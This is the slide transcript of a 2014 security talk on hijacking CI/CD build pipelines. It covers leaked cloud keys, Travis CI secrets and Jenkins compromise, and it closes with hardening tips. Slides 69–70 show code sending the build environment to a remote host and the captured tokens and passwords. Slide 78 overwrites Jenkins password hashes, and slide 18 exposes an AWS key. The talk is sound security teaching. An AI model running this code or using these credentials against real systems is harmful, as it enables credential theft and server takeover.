Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Is This Your Pipe? Hijacking the Build Pipeline

Kyle Kelley
August 10, 2014
Technology
1
1.3k

Is This Your Pipe? Hijacking the Build Pipeline

As developers of the web, we rely on tools to automate building code, run tests, and even deploy services. What happens when we're too trusting of CI/CD pipelines? Credentials get exposed, hijacked, and re-purposed. We'll talk about how often and what happens when people leak public cloud credentials, how some are protecting themselves using encrypted secrets, how to bypass protections against leaking decrypted secrets and how to turn their Jenkins into your own butler.

Kyle Kelley

August 10, 2014
Tweet

More Decks by Kyle Kelley

See All by Kyle Kelley
Jupyter Frontends: From the classic Jupyter Notebook, to JupyterLab, nteract and beyond
rgbkrk
0
3.4k
ephemeral docker workloads with jupyter at pytn
rgbkrk
2
270
tmpnb at PyTexas
rgbkrk
1
760
One Weird Kernel Trick: Hijacking IPython Websockets
rgbkrk
2
740

Other Decks in Technology

See All in Technology
様々な環境へコマンドラインツールを提供する上での苦労とその対策 / YAPC::Kyoto 2023
konboi
0
110
ノーコードAI開発プラットフォーム「AIMINA」のシステム設計コンセプトと技術的チャレンジ
sbtechnight
PRO
0
300
Kubernetes + containerd で cgroup v2 に移行したら "failed to create fsnotify watcher" エラーが発生する原因と対策
superbrothers
0
330
ロケーターを学んでテスト自動化上級者を目指そう
nozomiito
0
580
位置情報ビッグデータの可視化技術の紹介と実社会での活用
sbtechnight
PRO
0
320
SNS投稿を使ってクラウド障害を検知してみた
sbtechnight
PRO
0
340
[Keynote] Production is like ultra running: brutal, ungrateful, but worth every step
colinfay
0
110
PHPerKaigi 2023に行こう! / Let's Attend PHPerKaigi 2023!
tomzoh
1
110
dbtでデータ品質活動
foursue
5
1.2k
New Relic Lookoutはいいぞ!
kazumax55
0
170
GitHub Actionsと"仲良くなる"ための練習方法
tsubakimoto_s
2
130
Oracle Exadata Database Service on [email protected] X9M ([email protected]) 技術詳細
oracle4engineer
PRO
0
1.1k

Featured

See All Featured
How STYLIGHT went responsive
nonsquared
89
4.2k
Art Directing for the Web. Five minutes with CSS Template Areas
malarkey
197
11k
What the flash - Photography Introduction
edds
64
10k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
14
1.2k
Optimizing for Happiness
mojombo
366
65k
Designing Experiences People Love
moore
130
22k
Automating Front-end Workflow
addyosmani
1351
200k
The Straight Up "How To Draw Better" Workshop
denniskardys
226
130k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
6
910
Raft: Consensus for Rubyists
vanstee
130
5.7k
Making Projects Easy
brettharned
102
4.9k
Gamification - CAS2011
davidbonilla
75
4.1k

Transcript

  1. Is This Your Pipe?
    Hijacking the Build Pipeline

    View Slide

  2. Last login: Aug 7 2011 from DEFCON 19
    dc101$ whoami
    @rgbkrk
    dc101$ █

    View Slide

  3. Last login: Aug 7 2011 from DEFCON 19
    dc101$ whoami
    @rgbkrk
    dc101$ su greg
    dc101$ whoami
    @_GRRegg
    dc101$ █

    View Slide

  4. Last login: Aug 7 2011 from DEFCON 19
    dc101$ whoami
    @rgbkrk
    dc101$ su greg
    dc101$ whoami
    @_GRRegg
    dc101$ hostname
    @Rackspace
    dc101$ █

    View Slide

  5. Build Pipeline Components
    • Source Control
    • Continuous Integration
    • Upstream Sources

    View Slide

  6. OSS, Builds and Testing

    View Slide

  7. Real Sites
    Need Secrets

    View Slide

  8. What secrets?
    « 

    View Slide

  9. Managing
    Secrets

    View Slide

  10. Managing
    Secrets
    Not

    View Slide

  11. Credentials get leaked

    View Slide

  12. View Slide

  13. git add .

    View Slide

  14. –Rich Mogull
    “I did not completely scrub my code
    before posting to GitHub. I did not
    have billing alerts enabled ... This
    was a real mistake ... I paid the price
    for complacency.”

    View Slide

  15. [email protected]:~$ ls
    cpuminer
    CudaMiner
    tor-0.2.4.20.tar.gz
    cuda_5.5.22_linux_64.run
    tor-0.2.4.20

    View Slide

  16. [email protected]:~$ ls
    cpuminer
    CudaMiner
    tor-0.2.4.20.tar.gz
    cuda_5.5.22_linux_64.run
    tor-0.2.4.20

    View Slide

  17. bit.ly/mogull

    View Slide

  18. Ref: bit.ly/awsinapk
    07 40 00 e2 01 20 84 e2 02 27 82 e3 05 00 a0 e1 |[email protected] ...'......|
    01 10 a0 e3 05 30 a0 e3 ae fd ff eb 00 00 50 e3 |.....0........P.|
    2a ff ff 0a 09 00 a0 e3 10 d0 8d e2 f0 87 bd e8 |*...............|
    1f 40 2d e9 4c 30 90 e5 03 00 a0 e3 04 20 93 e5 |[email protected] ..|
    0c 00 cd e5 02 24 a0 e1 04 20 8d e5 01 00 a0 e1 |.....$... ......|
    07 20 d3 e5 04 10 8d e2 08 30 83 e2 08 30 8d e5 |. .......0...0..|
    0d 20 cd e5 13 ff ff eb 14 d0 8d e2 00 80 bd e8 |. ..............|
    41 4b 49 41 4a 35 4a 46 42 4d 53 5a 47 4d 37 58 |AKIAJ5JFBMSZGM7X|
    33 4a 34 41 00 00 00 00 47 38 41 4b 70 7a 71 2b |3J4A....G8AKpzq+|
    31 58 2b 64 65 4d 4f 74 72 63 6b 46 33 68 4a 79 |1X+deMOtrckF3hJy|
    63 65 2f 32 30 75 46 63 68 70 33 35 48 69 49 65 |ce/20uFchp35HiIe|
    00 00 00 00 2a b2 01 81 b0 b0 5f 84 00 00 00 00 |....*....._.....|
    a2 b2 01 81 b0 b0 af 01 00 00 00 00 3f 26 01 81 |............?&..|
    b0 b0 5f 84 00 00 00 00 78 ea ff 7f b0 b0 a8 80 |.._.....x.......|
    a0 ea ff 7f b0 b0 b0 80 30 eb ff 7f 01 00 00 00 |........0.......|
    40 eb ff 7f b0 b0 b0 80 44 eb ff 7f b0 b0 a8 80 |@.......D.......|
    5c eb ff 7f b0 af 10 80 e8 ef ff 7f b0 b0 b0 80 |\...............|
    !

    View Slide

  19. Ref: bit.ly/awsinapk
    07 40 00 e2 01 20 84 e2 02 27 82 e3 05 00 a0 e1 |[email protected] ...'......|
    01 10 a0 e3 05 30 a0 e3 ae fd ff eb 00 00 50 e3 |.....0........P.|
    2a ff ff 0a 09 00 a0 e3 10 d0 8d e2 f0 87 bd e8 |*...............|
    1f 40 2d e9 4c 30 90 e5 03 00 a0 e3 04 20 93 e5 |[email protected] ..|
    0c 00 cd e5 02 24 a0 e1 04 20 8d e5 01 00 a0 e1 |.....$... ......|
    07 20 d3 e5 04 10 8d e2 08 30 83 e2 08 30 8d e5 |. .......0...0..|
    0d 20 cd e5 13 ff ff eb 14 d0 8d e2 00 80 bd e8 |. ..............|
    41 4b 49 41 4a 35 4a 46 42 4d 53 5a 47 4d 37 58 |AKIAJ5JFBMSZGM7X|
    33 4a 34 41 00 00 00 00 47 38 41 4b 70 7a 71 2b |3J4A....G8AKpzq+|
    31 58 2b 64 65 4d 4f 74 72 63 6b 46 33 68 4a 79 |1X+deMOtrckF3hJy|
    63 65 2f 32 30 75 46 63 68 70 33 35 48 69 49 65 |ce/20uFchp35HiIe|
    00 00 00 00 2a b2 01 81 b0 b0 5f 84 00 00 00 00 |....*....._.....|
    a2 b2 01 81 b0 b0 af 01 00 00 00 00 3f 26 01 81 |............?&..|
    b0 b0 5f 84 00 00 00 00 78 ea ff 7f b0 b0 a8 80 |.._.....x.......|
    a0 ea ff 7f b0 b0 b0 80 30 eb ff 7f 01 00 00 00 |........0.......|
    40 eb ff 7f b0 b0 b0 80 44 eb ff 7f b0 b0 a8 80 |@.......D.......|
    5c eb ff 7f b0 af 10 80 e8 ef ff 7f b0 b0 b0 80 |\...............|
    !

    View Slide

  20. ಠ_ಠ

    View Slide

  21. Fun with
    Cloud Credentials

    View Slide

  22. Infrastructure + -

    View Slide

  23. “Redistribute”
    DNS and Load Balancers

    View Slide

  24. Remount
    Volumes

    View Slide

  25. Future SSH Keys

    View Slide

  26. Searching for keys

    View Slide

  27. AKIAJ

    View Slide

  28. OS_PASSWORD

    View Slide

  29. rackspace_api_key

    View Slide

  30. api_key
    >> 1000

    View Slide

  31. BREAK
    IT
    UP

    View Slide

  32. rackspace apikey language:python
    rackspace apikey -language:python
    SPLIT

    View Slide

  33. rackspace apikey language:python
    rackspace apikey -language:python
    X

    View Slide

  34. KEEP
    !
    SPLITTING

    View Slide

  35. Can’t we just
    let people know
    when they “SecOops”?

    View Slide

  36. gitsec/nanny
    Search repositories for security oops
    Email the original committer & owner of the
    project
    Let them know how to revoke keys, panic

    View Slide

  37. Responses
    “Wow, thank you. How did you find these?”
    “This is only a testing project”
    “I don’t even own this repository”
    “Doesn’t matter, I’m not using that account”

    View Slide

  38. 265+ Keys

    View Slide

  39. config/initializers/secret_token.rb

    View Slide

  40. ಠ_ಠ

    View Slide

  41. View Slide

  42. View Slide

  43. … we’ve confirmed this possibility by
    manual inspection
    TWITTER_CONSUMER_SECRET =
    'DEFINE-ME-HERE--DO-NOT-CHECK-IN-
    PUBLICLY'

    View Slide

  44. What if you need secrets
    for testing?

    View Slide

  45. Travis CI

    View Slide

  46. Travis CI
    • Open Source, free for public repos
    • git push -> web hook -> tasks
    • Less control than Jenkins

    View Slide

  47. language: python
    python:
    - 2.7
    before_install:
    - pip install invoke==0.4.0 pytest==2.3.5
    install:
    - pip install .
    script: invoke test

    View Slide

  48. language: python

    python: 2.7

    install: pip install .

    script: invoke test

    env:

    global:

    secure: hsgKUzwffhhTcmnnr1vYfvXiU…
    Encrypted Secrets

    View Slide

  49. Can we leak decrypted
    secrets?

    View Slide

  50. View Slide

  51. View Slide

  52. No?!?!

    View Slide

  53. – Travis CI
    “Keys used for encryption and decryption are
    tied to the repository. If you fork a project and
    add it to travis, it will have a different pair of
    keys than the original.”

    View Slide

  54. !
    "
    # #

    View Slide

  55. Props.

    View Slide

  56. View Slide

  57. Code
    Review!

    View Slide

  58. Who is Jenkins?
    How can I compromise him?

    View Slide

  59. View Slide

  60. Why Target Jenkins?
    The road to production

    View Slide

  61. View Slide

  62. View Slide

  63. View Slide

  64. Hipster developer makes an oops

    View Slide

  65. View Slide

  66. View Slide

  67. View Slide

  68. View Slide

  69. envs = os.environ
    message = str(envs)
    s = socket.socket(socket.AF_INET,
    socket.SOCK_STREAM)
    s.connect((TCP_IP, TCP_PORT))
    s.send(message)
    data = s.recv(BUFFER_SIZE)
    s.close()

    View Slide

  70. Connection address: ('104.130.129.241', 36621)
    received data: {'BUILD_DISPLAY_NAME': '#55',
    'BUILD_ID': '2014-08-07_20-50-38',
    'BUILD_NUMBER': '55',
    'BUILD_TAG': 'jenkins-scrapy-55',
    'BUILD_URL': 'http://104.130.129.241/job/scrapy/55/',
    'EXECUTOR_NUMBER': '1',
    'GID': '1000',
    'GITHUB_TOKEN': '7f550a9f4c44173a37664d938f1355f0f92a47a7',
    'GIT_BRANCH': 'origin/master',
    'GIT_COMMIT': '72e1a387ca969db942ea3b06b2e574d90db5c1df',
    'GIT_PREVIOUS_COMMIT': '72e1a387ca969db942ea3b06b2e574d90db5c1df',
    'GIT_URL': 'https://github.com/devGregA/scrapy',
    'HOME': '/var/lib/jenkins',
    'HUDSON_COOKIE': '46258990-8956-40b9-a826-b71b1bcda0bf',
    'HUDSON_HOME': '/var/lib/jenkins',
    'JENKINS_SERVER_COOKIE': '6d082cd38de4b35a',
    'JENKINS_URL': 'http://104.130.129.241/',
    'JOB_NAME': 'scrapy',
    'JOB_URL': 'http://104.130.129.241/job/scrapy/',
    'POSTGRES_USER': 'postgres'
    'POSTGRES_PASSWORD': 'HotSpankinWebApp'

    View Slide

  71. View Slide

  72. Targeting Jenkins Directly

    View Slide

  73. Digging In the Code
    !"" /var/lib/jenkins!
    ! !!"" users!
    ! !!!!"" !
    ! !!!!!!"" config.xml!

    View Slide

  74. config.xml


    admin





    S7o/e8JSXMPnBufr0s46br8X9qs2Xvixg7fyZcSyk2TEfr6P2Rm/JKw9xVRb9sYz




    #jbcrypt:$2a$10$Pw/2FPkJVEWZCYRmtzjNweyAA.5orVqBXpx3oP00O/xKmz02jQ/vi






    View Slide

  75. JBCrypt you say?


    admin

    . . .

    S7o/e8JSXMPnBufr0s46br8X9qs2Xvixg7fyZcSyk2TEfr6P2Rm/JKw9xVRb9sYz





    #jbcrypt:
    $2a$10$Pw/2FPkJVEWZCYRmtzjNweyAA.
    5orVqBXpx3oP00O/xKmz02jQ/vi






    View Slide

  76. jenkins/core/src/main/java/hudson/security/
    HudsonPrivateSecurityRealm.java
    /**
    * {@link PasswordEncoder} that uses jBCrypt.
    */
    !
    public String encodePassword(…) throws DataAccessException{
    return BCrypt.hashpw(rawPass,BCrypt.gensalt());
    }
    !
    public boolean isPasswordValid(…) throws DataAccessException{
    return BCrypt.checkpw(rawPass,encPass);
    }};

    View Slide

  77. ಠ_ಠ
    $2a$10$OP457.MLkiu9PnIvVq2IG.GkPB9xoMkN6V3F2Mj1p8y9qqWJZ6DtC
    public class Mal {
    public static void main(String[] args) {
    !
    String hashed =
    BCrypt.hashpw(“pwdplz", BCrypt.gensalt());
    System.out.println(hashed);
    }
    }

    View Slide

  78. What if this was in our build?
    results = os.listdir('/var/lib/jenkins/users/')
    for res in results:
    for line in fileinput.FileInput("/var/lib/jenkins/users/%s/config.xml" % res,inplace=1):
    line = re.sub(r"#jbcrypt:[^print line,
    message = 'using jenkins: %s ' % str(results)
    print os.system(‘pkill -HUP java‘)

    View Slide

  79. Let’s find out!

    View Slide

  80. There is a catch…

    View Slide

  81. Good news!

    View Slide

  82. View Slide

  83. Or Not…

    View Slide

  84. If you’re really committed…
    Keep. Committing.

    View Slide

  85. What if there aren’t any oops?

    View Slide

  86. Automatic PR Building

    View Slide

  87. Hitting the Gate

    View Slide

  88. Pressing Forward
    Be Sneaky
    Thwart the Gate

    View Slide

  89. Being Sneaky

    View Slide

  90. It can be as simple as
    ‘yp’
    static OSStatus
    SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
    uint8_t *signature, UInt16 signatureLen)
    {
    OSStatus err;
    ...
    !
    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
    goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
    goto fail;
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
    goto fail;
    ...
    !
    fail:
    SSLFreeBuffer(&signedHashes);
    SSLFreeBuffer(&hashCtx);
    return err;
    }

    View Slide

  91. Thwarting the Gate
    (Maybe.)

    View Slide

  92. /github-webhook/

    View Slide

  93. The worst case scenario

    View Slide

  94. The Quickest Overview On Securing Jenkins
    EVER

    View Slide

  95. Disable Anon Access

    View Slide

  96. Take Code Review Seriously

    View Slide

  97. Gate Your Deploys

    View Slide

  98. Use a Random Port for Slave Comms

    View Slide

  99. Disable Executors On Master

    View Slide

  100. Change your web-hook
    from the default URL

    View Slide

  101. View Slide